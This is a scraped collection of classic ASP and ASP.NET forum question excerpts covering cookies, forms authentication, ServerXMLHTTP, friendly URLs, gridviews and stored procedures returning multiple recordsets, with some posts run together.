    - Extracting data from a document Hi Guys, Not a problem with my code, but something I would like to add, (ASP VBScript) at the moment I have a form where a user uploads their details including a document (Doc, PDF, TXT, Docx) The document is uploaded to a folder on the server with the address being stored in the database and I'm tracking the user id through sessions. What I would like to do after the upload is redirect to a blank page, where some script extracts the data from the document and inserts it into another field on the database associated with the user id, I think this may be called parsing, but I'm at a complete loss, I don't suppose you guys have any ideas on this do you.     - HTML or XML depending on client. All, Suppose I have a widget A that I would like to embed in several websites B, C, and D. Sites B and C are happy with the widget the way I've styled it but site D isn't and wants to restyle it themselves. What would be the best way of doing this in ASP? My thoughts are that I have an ASP page that determines in a query string has been provided (issued to site D) and returns XML otherwise returns my formatted HTML. Any advice appreciated.     - ServerXMLHTTP and nodeValue versus nodeTypedValue All, Long time since I've done some proper coding in ASP and I've hit a wee snag that has got me baffled. Well two actually but the other is to do with running pages under Sun ASP so we'll not go there! Anyway, I digress... I've cobbled together some code as shown below (removed error checking etc for simplicity). This uses ServerXMLHTTP to grab an XML file off a remote server. When querying the result, however, the nodeValue property is null whereas the nodeTypedValue property isn't. Can anyone please advise as this I would expect nodeValue to be populated.     - PHP and ASP.Net Forms Authentication Our site currently authenticates people using a php page on our IIS 6 site. Basically this page takes their login information (user name and password) to see if they are in our Active Directory. Most of the current pages use php. We are building a couple aspx pages using .net 3.5 that we can host on the same server. I want to use the forms authentication ticket from the php login to authenticate the user for our application. Can anyone point me to resources to do this? In addition, our application uses role based security that is specific to our application. The first time the authenticated user accesses our application, I want to find the roles they have in our application and append that information to the forms authentication ticket. In one particular condition the final recordset is not passed to the page, so I need to detect that the object is empty.     - Checking for existence of a cookie I tried to post this last week, but never saw it, so I hope it's not a duplicate. (Sorry if it is.) I am rewriting our member log-in page in classic ASP from PHP. We will be switching platforms next month. Every member has an access number to log in. Once they have logged in, if they accept it, a cookie is provided so they do not have to log in again. When the code is supplied via the cookie or form, it is validated against a database file to determine the level (customer, distributor, etc.) and the page is built accordingly. If the code has been inactivated or is no longer valid, appropriate messages are supplied. Pretty basic stuff. The first thing I want to do is to check if the cooky exists on the client computer. PHP had code for this, but I'm not sure I'm doing it correctly in classic ASP. My opening code is below. This is before any HTML on the page, as I have to determine if cookeis need to be set or deleted before the page opens. When I run this on my IIS server here, the page displays an error 500, but no hints as to what line the error is in. Can anyone help. I suspect it is because at this state, the cookie does not exist, as it is my first log-in. Thanks in advance.     - ASP.NET web app works on some, not all, workstations I have a client that has contracted with a bank to process checks over the Internet. The solution includes a check scanner and APS.NET web application. The application does not work for all workstations at the client site. There are two laptop computers than can run the web application and all it's functions w/o failure. They have been able to do this from day one w/o modification. No other PC workstations can run all of the web application functions. Some page return an 'Internal Server Error' message. The page displayed is a custom error page with no other details. For some reason the owners of the web application have no clue why their application will work for some, but not others. Some facts: All workstations are XP SP2 There is a mix of IE6 and 7 but this does not seem to be an issue because each laptop has a different version (1 has IE7, the other has IE6). Application will not allow browsers other than IE5.5 or higher (Firefox is out) The application requires an ActiveX control to interface with the scanner. Check scanning is not an issue.     - MS XMLHTTP or File System Object to Get Content The friendly URLs in ASP is the goal of my project. However, in ASP there is no obvious page mapping as I researched compared to other languages. What I mean is making www.site.com?page=Home being www.site.com/home/. One of the workaround I know is to use MS XMLHTTP request on www.site.com/home/index.asp page which will get the HTML content of www.site.com?page=Home. I might replace some folder depth if needed in resulting HTML. However, there is another solution of using File System Object to get the file's content (HTML) and display in the same way.     - Disappearing ASP Cookies I have a classic ASP page which links through to an ASP.NET 1.1 page. Basically there is a hyperlink on the classic ASP page that opens the ASP.NET page in the same window. I can then go back to my classic ASP page by clicking on a link on the ASP.NET page. It all seems to work seamlessly, apart from 1 end user. What they find is that if they click on the link and open up the ASP.NET page, then go back to the classic ASP page, all the classic ASP cookies have been emptied out, yet the session info still remains.     - Datagridview Won't stay updated I am posting this for a coworker. -------------------------------------------------------- The issue i'm having is after i enter all my data into my gridview's textboxes and dropdownlists the data wont stick. My object data source dumps to a class but after the update the grid should read from the class as well. After the update button is clicked all the data passes through the class like it should and doesn't throw any errors.     - Multiple Recordsets from 1 Stored Procedure Hi there, I have a Stored Procedure in SQL 2000 that takes 10 input paremeters, and outputs 11 recordsets, not rows, but 11 different SELECT statements. The purpose of this is to for a menu system in a store. If all the inputs are NULL, then just the top level categories are output in the first recordset. The ID of each category will then be passed back into the stored procedure where it then filters the second recordset to create the second level of categorisation. I have a form that uploads content to a server not managed by us. When the form is filled in and posted, the response from the server is an XML response. However when that happens, I'm not longer at my asp page, I'm redirected the XML response URL that's managed by the third party server. I have two questions are a result: 1) I understand I can use XmlHTTP to simulate a form and post that using XmlHttp.Send String. However, the form that uploads content is quite complex. It contains 4 type=text input fields, 1 textarea field, and a type=file field. How would I specify all this in the XmlHttp.Send String? More specifically, how would I specify the type=file field? There is a tracking feature on the site that shows what users are editing based on their user id session that is created when they log in. You can use the rs.Save method to persist the recordsets to XML files. I
haven't done this in a while and I have no time to go read the
documentation so I'm not sure if this requires a client-side cursor or
not.. My feeling is that client-side cursors are required.
You cannot #include them as-is however. You have to have a page that
uses the rs.Open method to open the file.
